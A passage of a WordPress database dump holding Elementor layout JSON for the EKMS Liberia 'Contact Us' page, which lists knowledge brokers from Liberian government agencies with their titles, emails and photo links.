href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7f527f1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9540449\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"baed7dc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b97200c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\nManager\\nDepartment of Marine Fisheries and Environment\\nNaFAA\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Martin Killen <\\/strong><br \\/>IT Officer<br \\/>NaFAA<br \\/><a href=\\\"mailto:maskillen@nafaa.gov.lr\\\">maskillen@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"625a74e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9bf0510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e162bb8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"593819f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3ef1bd5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"334f9e9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24388,3594,'_elementor_edit_mode','builder'),(24389,3594,'_elementor_template_type','wp-page'),(24390,3594,'_elementor_version','3.0.16'),(24391,3594,'_wp_page_template','default'),(24392,3594,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{